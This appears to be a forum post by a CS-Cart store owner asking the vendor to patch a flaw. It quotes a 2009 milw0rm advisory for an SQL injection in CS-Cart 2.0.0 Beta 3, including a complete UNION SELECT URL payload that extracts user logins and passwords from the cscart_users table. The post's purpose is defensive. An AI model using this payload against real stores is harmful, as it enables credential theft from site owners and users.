info on CS-Cart 2.0 Exploit

Please fix this asap as i came across this in an internet search and do not want my site affected





CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability

Provider: www.cs-cart.com

Discovered by netsoul

Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke

Contact: netsoul2[at]gmail.com

ALTO PARANA - PARAGUAY

Ñane mba’e teete

#####################################################



Exploit:



http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289’ UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*





#####################################################


milw0rm.com [2009-03-09]

this may have already been fixed, if thats the case just please delete this thread